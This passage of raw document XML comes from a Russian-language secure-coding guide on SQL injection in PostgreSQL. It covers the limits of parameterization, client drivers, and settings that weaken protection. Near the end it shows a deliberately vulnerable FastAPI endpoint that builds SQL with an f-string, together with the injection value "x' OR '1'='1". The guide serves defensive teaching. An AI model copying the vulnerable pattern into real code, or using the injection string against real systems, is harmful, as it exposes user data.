        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT INTO t (a, b) VALUES ($1, $2)      -- insert values</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATE t SET col = $1 WHERE id = $2       -- update values</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT $1 OFFSET $2                        -- LIMIT/OFFSET по числам</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ARRAY[$1, $2, $3]                         -- значения в массиве</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON_OBJECT('key', $1)                    -- значения в JSON-конструкторах</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В этих контекстах сервер ждёт literal — placeholder подставляется без интерпретации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Где параметризация НЕ ПОМОГАЕТ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Места, где SQL-грамматика ожидает identifier или keyword, а не literal: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Имена таблиц, колонок, схем</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SELECT * FROM $1 WHERE ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — синтаксическая ошибка. Решение —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 whitelist (см. 5.2, 3.16).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Сортировка `ORDER BY column_name`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: имя колонки — identifier. Решение — whitelist (см. 3.14.2).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`ORDER BY column_number`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (числовое): можно параметризовать в некоторых драйверах через явный cast, но проще whitelist.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`LIKE`-паттерны</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: значение параметризуется, но метасимволы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внутри значения остаются активными. Решение — escape (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">replace(..., '%',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ESCAPE '\\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (см. 3.15.1).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`tsquery`-операторы</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to_tsquery($1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> парсит значение как tsquery-expression. Решение —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(см. 3.15.3).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`SET`-команды</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search_path = $1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не работает (SET ожидает identifier-like syntax). Решение — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET LOCAL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с whitelist значений.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Динамический SQL внутри PL/pgSQL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с конкатенацией — небезопасно. Решение — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE ... USING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для значений +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для identifier-ов (см. 3.16.3).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Клиентские SQL builders с конкатенацией</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: ORM-helper, который собирает строку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bypass всей параметризации. Решение — пользоваться API builder-а через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">select().where(col == value)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-style вместо raw string.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В этих местах никакая параметризация на server-level не помогает — нужны другие защитные приёмы из 5.2 и 5.7.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Driver matrix: как добиться extended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Стек</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Безопасный вызов</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Что обеспечивает защиту</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Python + psycopg2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cur.execute(sql, params)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client-side </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">adapt()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-экранирование (текст-режим всегда)</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Python + psycopg3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cur.execute(sql, params)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через extended protocol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Python + asyncpg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conn.fetch(sql, *args)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$1</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через extended protocol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Java + pgjdbc</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PreparedStatement</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setXxx()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default </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">preferQueryMode=extended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Go + pgx v5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conn.Query(ctx, sql, args...)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$1</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default </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">QueryExecModeCacheStatement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Node.js + pg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client.query(sql, [values])</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$1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-placeholder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через extended protocol</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.NET + Npgsql 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cmd.Parameters.AddWithValue(...)</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@name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Parse + Bind через extended protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Подробный разбор по 6 драйверам — в категории 3.5. Главный антипаттерн для всех: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">значение в SQL-тексте</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, неважно через какой механизм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f-string, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">String.format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fmt.Sprintf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, template literal,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SQL).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что ломает защиту даже при использовании API</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Принудительный simple protocol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preferQueryMode=simple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в pgjdbc URL, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">simple_protocol=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в pgx, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">QueryExecModeSimpleProtocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — драйвер уходит в simple-режим и парсит параметры client-side. Защита превращается в zerolayer client-side escaping, который проигрывает invalid-UTF-8 / encoding-конфликт-атакам (R6, CVE-2025-1094).</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Конкатенация снаружи placeholder-а</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cur.execute(f"SELECT * FROM {table} WHERE id = %s", (user_id,))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table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> подставляется в SQL-текст, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">user_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> параметризован. Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> контролируется user-ом — injection через identifier (см. 5.2).</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`Statement.execute()` в pgjdbc вместо `PreparedStatement`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: всегда simple, нет server-side параметризации, защита только в client-side escape (см. 3.5.4).</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`client.query(sql)` без `values` в node-postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: simple protocol; даже одна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после значения проходит как stacked query (см. 3.5.6).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Пример безопасного и небезопасного кода (FastAPI + SQLAlchemy text + asyncpg-стек)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Небезопасно — конкатенация:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/users/by_name/{name}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def get_user(name: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query = text(f"SELECT id, email FROM users WHERE name = '{name}'")</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">name = "x' OR '1'='1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> даёт классический UNION-канал (см. 3.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Безопасно — параметризация через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">:param</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@router.get("/users/by_name/{name}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def get_user(name: str, session: AsyncSession = Depends(get_session)):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text("SELECT id, email FROM users WHERE name = :name")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(query, {"name": name})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLAlchemy преобразует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в нативный driver placeholder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для asyncpg,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для psycopg), отправляет значение как параметр в Bind-сообщении.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Связь с другими разделами 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5.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — что делать там, где параметризация структурно не работает (identifiers).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5.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — детекция bypass-попыток в логах (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
